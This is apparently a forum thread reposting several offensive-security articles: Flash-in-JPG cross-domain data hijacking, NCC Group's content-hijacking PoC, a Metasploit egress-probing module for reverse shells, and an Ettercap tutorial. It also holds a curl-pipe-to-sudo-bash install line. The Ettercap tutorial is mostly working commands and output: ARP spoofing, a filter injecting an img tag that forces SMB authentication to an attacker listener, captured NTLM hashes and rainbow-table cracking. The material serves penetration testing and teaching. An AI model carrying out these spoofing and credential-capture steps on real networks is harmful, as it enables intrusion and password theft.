Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! Introduction: This post introduces a technique that has not been covered previously in other topics related to file upload attacks, such as Unrestricted file upload and File in the hole. Update 1 (21/05/2014): It seems @fransrosen and @avlidienbrunn were quicker than me in publishing this technique! Yesterday they published a very good blog post about this issue: Detectify Blog – The pitfalls of allowing file uploads on your... I highly recommend reading the other blog post as well, especially for its nice JSONP trick. I wanted to wait until the end of this week to publish mine, but now that this technique is already published, I am releasing my post too. The draft version of this post and the PoCs were ready before, but I was not sure when I was going to publish this, as it would affect a lot of websites; this was a note for bug bounty hunters! The only point of this blog post now is the way I had initially looked at the issue. Update 2 (21/05/2014): People on Twitter were very resourceful and reminded me that this was not in fact a new technique and that some other bug bounty hunters are already using it in their advisories! I wish they had documented this properly before. The following links are related to this topic: Content-Type Blues | dead && end (Content-Type Blues) https://bounty.github.com/researchers/adob.html (Flash content-type sniffing) How safe is the file uploader? Imagine that there is a file uploader that properly validates the uploaded file's extension using a whitelist method. This file uploader only allows a few non-dangerous extensions such as .jpg, .png, and .txt. Moreover, it checks that the filename does not contain any non-alphanumeric characters! This seems to be a simple and safe method to protect the server and its users, if the risks of file processor bugs and file inclusion attacks have already been accepted. What can possibly go wrong? This file uploader does not perform any validation of the file's content, and therefore it is possible to upload a malicious file with a safe name and extension to the server. However, when the server is properly configured, this file cannot be run on the server. Moreover, the file will be sent to the client with an appropriate content type such as text/plain or image/jpeg; as a result, an attacker cannot exploit a cross-site scripting issue by opening the uploaded file directly in the browser. Enforcing the content type by using an OBJECT tag! If we could change the file's content type for the browsers, we would be able to exploit this issue! But nowadays this is not directly possible, as it would count as a security issue in the browser. I knew straight away that the "OBJECT" tag has a "TYPE" attribute, but I was not sure which content types would force the browser to actually load the object instead of showing its contents (the "OBJECT" tag can act as an IFrame). I have created a test file (located at Object content-type test) that loads object tags with different MIME types, and the result is as follows (Java and Silverlight were not installed): "application/futuresplash": loads the file as a Flash object; "application/x-shockwave-flash": loads the file as a Flash object; "text/x-component": only works in IE to load .htc files(?)
"application/pdf" and a few others: loads the file as a PDF object. The result can differ depending on the plugins installed. So I can load any uploaded file as a Flash file. Now I can upload a malicious Flash file onto the victim's server as a .JPG file and then load it as a Flash file on my own website. Please note that there is no point in uploading a Flash file that is vulnerable to XSS, as it would run under my website's domain instead of the target's. Exploitation: I found out that the embedded Flash can still communicate with its source domain without checking the cross-domain policy. This makes sense, as the Flash file actually belongs to the victim's website. As a result, the Flash file that has been uploaded as a .JPG file to the victim's website can load important files of the victim's website using the current user's cookies; it can then send this information to JavaScript on the attacker's website, which has embedded this JPG file as a Flash file. The exploitation is like a CSRF attack: you need to send a malicious link to a user who is already logged in to the victim's website (it still counts as CSRF even if you are not logged in, but this is out of the scope of this post). The malicious Flash should have already been uploaded to the victim's website. If the uploader itself is vulnerable to a CSRF attack, an attacker can first upload a malicious Flash file and then use it to hijack the user's sensitive data or perform further CSRF attacks. As a result, an attacker can collect valuable information found in the responses of different pages of the victim's website, such as user data, CSRF tokens, etc. The following demonstrates this issue: A) 0me.me = attacker's website B) sdl.me = victim's website C) A JPG file that is actually a Flash file has already been uploaded to the victim's website: http://sdl.me/PoCs/CrossDomainDataHijack.jpg (the source code of this Flash file is accessible via the following link: http://0me.me/demo/SOP/CrossDomainDataHijack.as.txt ) D) There is a secret file on the victim's website (sdl.me) that we are going to read by using the attacker's website (0me.me): http://sdl.me/PoCs/secret.asp?mysecret=original E) Note that the victim's website does not have any crossdomain.xml file: http://sdl.me/crossdomain.xml F) Now an attacker sends the following malicious link to a user of sdl.me (the victim's website): Cross Domain Data Hijack. By pressing the "RUN" button, 0me.me (the attacker's website) can read the contents of the secret.asp file hosted on sdl.me (the victim's website). This is just a demo file that could be completely automated in a real scenario. Note: If another website such as Soroush.me has added sdl.me as trusted in its crossdomain.xml file, the attacker's website can now also read the contents of Soroush.me by using this vulnerability. Limitations: An attacker cannot read the cookies of the victim.com website. An attacker cannot run JavaScript code directly by using this issue. Future work: Other client-side technologies such as PDF, Java applets, and Silverlight might be used instead of Flash. Bypassing the Flash security sandbox when a website uses "Content-Disposition: attachment;" can also be a research topic. If somebody bypasses this, many mail servers and file repositories will become vulnerable. Recommendations: It is recommended to check that the file's content has the correct header and format.
If possible, use the "Content-Disposition: attachment; filename=Filename.Extension;" header for files that do not need to be served in the web browser. Flash actually logs a security warning for this. Isolating the uploaded files on a separate domain is also a good solution, as long as the crossdomain.xml file of the main website does not include the isolated domain. Sursa: https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
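As a rough illustration of the first recommendation (my own sketch, not from the advisory), here is a content check that rejects uploads whose bytes look like a Flash file rather than an image:

[code]
# Minimal sketch (my addition): verify that an "image" upload really starts
# with an image signature and is not a disguised Flash file; SWF files begin
# with the magic bytes FWS, CWS or ZWS.
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")   # uncompressed / zlib / LZMA SWF

def looks_like_safe_image(data: bytes) -> bool:
    """Accept only files whose content matches a JPG/PNG header."""
    if data.startswith(SWF_MAGICS):
        return False                    # Flash masquerading as an image
    return data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)

if __name__ == "__main__":
    with open("upload.jpg", "rb") as f:  # hypothetical uploaded file
        print("accept" if looks_like_safe_image(f.read(16)) else "reject")
[/code]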
-
Cross-Site Content Hijacking (XSCH) PoC License Released under AGPL (see LICENSE for more information). Description This project can be used for: Exploiting websites with insecure policy files (crossdomain.xml or clientaccesspolicy.xml) by reading their contents. Exploiting insecure file upload functionalities which do not check the file contents properly or allow uploading SWF or PDF files without a Content-Disposition header during the download process. In this scenario, the created SWF, XAP, or PDF file should be uploaded with any extension such as .JPG to the target website. Then, the "Object File" value should be set to the URL of the uploaded file to read the target website's contents. Note: .XAP files can be renamed to any other extension but they cannot be loaded cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension. Usage Exploiting an insecure policy file: 1) Host the ContentHijacking directory with a web server. 2) Browse to the ContentHijacking.html page. 3) Change the target in the HTML page to a suitable object from the "objects" directory ("xfa-manual-ContentHijacking.pdf" cannot be used). Exploiting an insecure file upload/download: 1) Upload an object file from the "objects" directory to the victim server. These files can also be renamed with another extension when uploaded to another domain (for this purpose, first use Flash and then PDF, as Silverlight XAP files will not normally work with another extension from another domain). 2) Change the target in the HTML page to the location of the uploaded file. Note: .XAP files can be renamed to any other extension but they cannot be loaded cross-domain anymore. It seems Silverlight finds the file extension based on the provided URL and ignores it if it is not .XAP. This can still be exploited if a website allows users to use ";" or "/" after the actual file name to add a ".XAP" extension. Note: When Silverlight requests a .XAP file cross-domain, the content type must be: application/x-silverlight-app. Note: PDF files can only be used in the Adobe Reader viewer (they will not work with the Chrome and Firefox built-in PDF viewers). Usage Example: in IE with Adobe Reader: https://15.rs/ContentHijacking/ContentHijacking.html?objFile=objects/ContentHijacking.pdf&objType=PDF&target=http://0me.me/&POSTData=Param1=Value1 Generic Recommendation to Solve the Security Issue The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. If in doubt, the file should be discarded. Adding a "Content-Disposition: Attachment" header to static files will secure the website against Flash/PDF-based cross-site content hijacking attacks. It is recommended to apply this practice to all of the files that users need to download, in all the modules that deal with a file download. Although this method does not secure the website against attacks using Silverlight or similar objects, it can mitigate the risk of using Adobe Flash and PDF objects, especially when uploading PDF files is permitted.
Flash/PDF (crossdomain.xml) or Silverlight (clientaccesspolicy.xml) cross-domain policy files should be removed if they are not in use and there is no business requirement for Flash or Silverlight applications to communicate with the website. Cross-domain access should be restricted to a minimal set of domains that are trusted and will require access. An access policy is considered weak or insecure when a wildcard character is used, especially in the value of the "uri" attribute. Any "crossdomain.xml" file which is used for Silverlight applications should be considered weak, as it can only accept a wildcard ("*") character in the domain attribute. Browser caching should be disabled for the crossdomain.xml and clientaccesspolicy.xml files. This enables the website to easily update the file or restrict access to the Web services if necessary. Once the client access policy file is checked, it remains in effect for the browser session, so the impact of non-caching on the end user is minimal. This can be raised as a low or informational risk issue based on the content of the target website and the security and complexity of the policy file(s). Note: Using the "Referer" header is not a solution, as it is possible to set this header, for example by sending a POST request using Adobe Reader and PDF (see the "xfa-manual-ContentHijacking.pdf" file in the "objects" directory). Project Page See the project page for the latest update/help: https://github.com/nccgroup/CrossSiteContentHijacking Author Soroush Dalili (@irsdl) from NCC Group References Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/ Multiple PDF Vulnerabilities - Text and Pictures on Steroids InsertScript: Multiple PDF Vulnerabilities - Text and Pictures on Steroids HTTP Communication and Security with Silverlight http://msdn.microsoft.com/en-gb/library/cc838250(v=vs.95).aspx Explanation Of Cross Domain And Client Access Policy Files For Silverlight http://www.devtoolshed.com/explanation-cross-domain-and-client-access-policy-files-silverlight Cross-domain policy file specification Cross-domain policy file specification | Adobe Developer Connection Setting a crossdomain.xml file for HTTP streaming Setting crossdomain.xml file for HTTP streaming | Adobe Developer Connection Sursa: https://github.com/nccgroup/CrossSiteContentHijacking
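A small illustration of the policy-file recommendations above (my own sketch, not part of the NCC Group project): fetch a site's crossdomain.xml and flag wildcard allow-access-from entries, which the text describes as weak or insecure; the URL is a placeholder.

[code]
# Minimal sketch (my addition): download crossdomain.xml and report any
# allow-access-from entries whose domain attribute contains a wildcard.
import urllib.request
import xml.etree.ElementTree as ET

def weak_policy_domains(base_url: str):
    """Return the allow-access-from domains containing a wildcard."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/crossdomain.xml") as resp:
        root = ET.fromstring(resp.read())
    weak = []
    for entry in root.iter("allow-access-from"):
        domain = entry.get("domain", "")
        if "*" in domain:
            weak.append(domain)
    return weak

if __name__ == "__main__":
    for d in weak_policy_domains("http://example.com"):   # placeholder target
        print("wildcard allow-access-from:", d)
[/code]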
-
[h=1]instavpn[/h] [h=3]Requirements[/h] Ubuntu 14.04, 512 MB RAM [h=3]Install[/h] curl -sS https://sockeye.cc/instavpn.sh | sudo bash [h=3]Web UI[/h] Browse to http://IP-ADDRESS:8080 [h=3]CLI[/h]
instavpn list - Show all credentials
instavpn stat - Show bandwidth statistics
instavpn psk get - Get pre-shared key
instavpn psk set <psk> - Set pre-shared key
instavpn user get <username> - Get password
instavpn user set <username> <password> - Set password or create user if not exists
instavpn user delete <username> - Delete user
instavpn user list - List all users
instavpn web mode [on|off] - Turn on/off web UI
instavpn web set <username> <password> - Set username/password for web UI
Sursa: https://github.com/sockeye44/instavpn
-
[h=3]Metasploit: Getting outbound filtering rules by tracerouting[/h] Deciding between a bind or reverse shell depends greatly on the network environment in which we find ourselves. For example, in the case of choosing a bind shell, we have to know in advance whether the machine is reachable on any port from the outside. Some time ago I wrote about how we can get this information (inbound filtering rules) using the packetrecorder script from Meterpreter. Another alternative is to use an IPv6 bind shell (bind_ipv6_tcp). The idea of this payload is to create an IPv6 tunnel over IPv4 with a Teredo relay, through which the bind shell becomes reachable from an IPv6 address. You can read more about this in the post: Revenge of the bind shell. On the other hand, in the case of using a reverse shell, we must know the outbound filtering rules of the organization to see if our shell can get outside. In most situations we usually choose ports 80 or 443, since these ports are rarely blocked for an ordinary user. However, there are cases in which we face a much more restrictive scenario. For example, if we get access to a server on an internal network and want to install a reverse shell from that server to the outside, outgoing connections on ports 80 and 443 may be denied. The reverse_tcp_allports payload was created to work in such environments. This payload will attempt to connect to our handler (installed on a certain external machine) using multiple ports. The payload supports the argument LPORT, by which we specify the initial connection port. If it cannot connect to the handler, it will increase the port number by 1 until a connection is made. The problem with this approach is that it is very slow due to the timeouts of blocked connections. In addition, much noise is generated as a result of each of these connections. Because of the need to know which outgoing ports are allowed, I have made a post-exploitation Meterpreter module that allows you to infer the TCP filtering rules for the desired ports. At first I thought of using the same logic as the MetaModule "Egress Firewall Testing" built into Metasploit Pro v4.7. This MetaModule allows you to get outbound rules by sending SYN packets to one of the servers hosted by Rapid7 (egadz.metasploit.com). The server is configured to respond on all ports (all 65535 ports are open), so if your host receives a SYN/ACK you can deduce that a certain port is not filtered. This service is similar to http://portquiz.net, which I have sometimes used, usually on Linux machines, to learn the filtering policies of the organization in which I am doing a pentest. However, I did not like the idea of depending on a particular external service. Moreover, while it would be easy to prepare a machine with a couple of iptables rules, I still found it a bit cumbersome. After weighing some options, I ended up creating the outbound_ports.rb module for Windows, which does not depend on any service or external configuration. The module is a kind of traceroute using TCP packets with incremental TTL values. The idea is to launch a TCP connection to a public IP (this IP does not need to be under your control) with a low TTL value. As a result of the TTL, some intermediate device will return an ICMP "TTL exceeded" packet. If the victim host is able to read that ICMP packet, we can infer that the port used is not filtered. By default, the TTL will start with a value of 1, although this can be changed with the parameter MIN_TTL. With HOPS we indicate the number of hops to probe.
Personally I tend to use a low value, since all I need is to get an ICMP response from a public IP. The module also has a TIMEOUT parameter to set the waiting time of the ICMP socket. In the following example I've used the public IP 208.84.244.10 to check whether outbound connections to ports 443 and 8080 are filtered. As shown, we obtained several ICMP replies from different routers, so now we know that those ports would be good candidates for our reverse shell. You can play around with the HOPS and MIN_TTL options. For example, if you do not want to create so much noise, you can set an initial TTL of 3 and set the number of hops to 1. In that case, and unless the organization has a complex network, you could receive a quick response from an external IP. Another alternative is to set the STOP option to true. Thus, when a public IP responds with an ICMP packet, the script will not continue launching more connections. As you can tell, the module is also useful for inferring the network topology of our target, working in the same way as a traceroute. Internally, the module uses two sockets: first, a TCP socket in non-blocking mode. This socket is in charge of launching SYN packets with different TTL values (set with the setsockopt API and the IP_TTL option). On the other hand, a raw ICMP socket is needed to read the ICMP responses. Since the Windows firewall blocks this type of packet by default, the module uses netsh to allow incoming ICMP traffic. The module was under review at the time of writing; it is already included in Metasploit. Posted by Borja Merino at 12:26 PM Sursa: Shell is coming ...: Metasploit: Getting outbound filtering rules by tracerouting
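For readers who want to reproduce the idea from a non-Meterpreter host, here is a rough Scapy sketch (my own, not Borja Merino's outbound_ports.rb): it sends TCP SYNs with a small, increasing TTL and treats an ICMP time-exceeded reply as evidence that the outbound port is not filtered; the target IP and ports are placeholders.

[code]
# Minimal sketch (my addition, not the Metasploit module): TCP-traceroute-style
# probing of egress filtering. Requires scapy and root privileges.
from scapy.all import IP, TCP, ICMP, sr1

TARGET = "208.84.244.10"       # any public IP, does not need to be ours
PORTS = [443, 8080]

def port_allowed_outbound(dport: int, max_ttl: int = 4) -> bool:
    for ttl in range(1, max_ttl + 1):
        reply = sr1(IP(dst=TARGET, ttl=ttl) / TCP(dport=dport, flags="S"),
                    timeout=2, verbose=0)
        if reply is None:
            continue
        # ICMP type 11 = time exceeded: some router saw our SYN, so the local
        # egress filter did not block the port.
        if reply.haslayer(ICMP) and reply[ICMP].type == 11:
            return True
        # A SYN/ACK straight from the target also proves the port gets out.
        if reply.haslayer(TCP) and (int(reply[TCP].flags) & 0x12) == 0x12:
            return True
    return False

if __name__ == "__main__":
    for p in PORTS:
        print(p, "allowed" if port_allowed_outbound(p) else "filtered?")
[/code]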
-
You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage. Note: your mileage may vary with this stew. I'm not Martha Stewart. Also, the stew analogy ends here. The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap. The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database. The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get the rcracki_mt binary. You will also need to download the HALFLMCHALL rainbow tables, so visit that same tutorial. The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card.

sudo add-apt-repository ppa:xorg-edgers/ppa
sudo apt-get update
sudo apt-get install nvidia-331 nvidia-settings-331

Now we have all our ingredients. Sorry, I promised the analogy would end. Let's Get To It! What we will accomplish is Address Resolution Protocol (ARP) spoofing of a local network segment, injecting HTML whenever a user surfs the Internet/intranet, and forcing clients to perform a Server Message Block (SMB) authentication back to a Metasploit listener that forces authentication with a known challenge. With a known challenge, and if LanManager hashing is still enabled in the environment (Windows XP clients), a rainbow table can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used, you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card, i.e. oclHashcat. Setting Up Metasploit SMB Server

# service smbd stop
smbd stop/waiting
# /opt/metasploit-framework/msfconsole
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >

ARP Spoofing and Packet Filtering with Ettercap Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or affect network performance. While this is outside the scope of this article, you may want to target the workstations of any Windows administrators to obtain their hash...for obvious reasons. Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap.
ARP Spoofing and Packet Filtering with Ettercap

Note that when conducting ARP spoofing you will negatively impact network traffic if you simply spoof every host. Make your attack targeted so it does not raise any red flags or affect network performance. While it is outside the scope of this article, you may want to target the workstations of any Windows administrators to obtain their hashes…for obvious reasons. Before we start Ettercap we need to construct a filter that parses HTTP (port 80) traffic and injects a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and to learn how filtering works in Ettercap.

Open your favorite text editor and paste the code below.

# vim http-img.filter

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is the same length as the original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body ");
   msg("Filter Ran 4.\n");
}

Once the file is saved, use etterfilter to compile it into the binary format Ettercap understands.

# etterfilter http-img.filter -o http-img.ef
etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team
12 protocol tables loaded:
   DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
   VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'http-img.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'http-img.ef' done.
-> Script encoded into 15 instructions.

Copy the compiled filter to the Ettercap share folder (this may be /usr/local/share/ettercap on a source install).

# cp http-img.ef /usr/share/ettercap

If you know your target, you can start Ettercap from the command line to begin sniffing, ARP spoofing, and filtering traffic.

# ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0

If you prefer the GUI, follow the screenshots found here. This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit.

msf auxiliary(smb) > [*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014
NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108
USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:09af7e143207525cfc17e4037a1f0a54
NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000

The last step is to crack the hash we obtained. The example above has LM hashing disabled, so for demonstration purposes we will use LM and NTLM hashes captured during an actual penetration test. One of the Metasploit options we set was JOHNPWFILE; it saves every captured hash in the format John the Ripper uses to crack passwords, and the same material can be fed to oclHashCat.
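A quick aside (again, not in the original post): the NTLMv2 capture shown above can go straight to the GPU. In the oclHashcat builds of this era, NetNTLMv2 is hash mode 5600 and, if I am reassembling the fields correctly, it expects user::domain:server_challenge:nt_proof:blob on a single line; netntlmv2.txt and the rockyou wordlist below are just placeholder names.

Owner::COMPUTER-2554:1122334455667788:09af7e143207525cfc17e4037a1f0a54:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000

# ./cudaHashcat64.bin -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt

(cudaHashcat64.bin is the Nvidia binary; AMD users would run oclHashcat64.bin instead.)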
But before we lean on the GPU, we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty.

Username::WINDOWSDOMAIN:1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788

We will use rcracki_mt and the HALFLMCHALL rainbow table to crack the first 7 characters of the password. This only requires the first 16 hex characters of the NetLM response: 1d006cfe2f3a9f72.

# cd ~/tools/rcracki_mt_0.7.0_linux_x86_64
~/tools/rcracki_mt_0.7.0_linux_x86_64# ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72
Using 1 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti
reading index... 13528977 bytes read, disk access time: 0.00 s
reading table... 461190920 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 1d006cfe2f3a9f72 is GOOSE00
cryptanalysis time: 0.06 s

statistics
-------------------------------------------------------
plaintext found:            1 of 1 (100.00%)
total disk access time:     0.00s
total cryptanalysis time:   0.06s
total pre-calculation time: 2.34s
total chain walk step:      2876401
total false alarm:          31
total chain walk step due to false alarm: 68140

result
-------------------------------------------------------
1d006cfe2f3a9f72  GOOSE00  hex:474f4f53453030

Now we brute force the remaining portion of the password using a Ruby script that ships with Metasploit.

# cd /opt/metasploit-framework/tools
/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00
[*] Trying one character...
[*] Trying two characters (eta: 12.858231544494629 seconds)...
[*] Cracked: GOOSE004#

Using the script to brute force up to three additional characters (a ten-character password in total) is about as far as you want to go with halflm_second.rb, and ten characters is not too shabby. As the example below shows, a longer password will not be cracked in a reasonable amount of time, especially if you are on a penetration test with a limited testing window.

Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788

/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI
[*] Trying one character...
[*] Trying two characters (eta: 10.010079860687256 seconds)...
[*] Trying three characters (eta: 2292.3082880973816 seconds)...
[*] Trying four characters (eta: 524938.5979743004 seconds)...

The four-character estimate of 524,938 seconds works out to roughly 6.075 days for an eleven (11) character password. I have no idea how long a 12-character password would take, but it is exponentially longer and is not even scripted into halflm_second.rb. So oclHashcat and GPU password cracking to the rescue! To continue the saga, visit this tutorial on using Hashcat to brute force the second half of the password.

Great sites to learn about Ettercap filtering:
Fun with Ettercap Filters
"Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples
ETTERCAP - The Easy Tutorial - Man in the middle attacks

Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security
-
-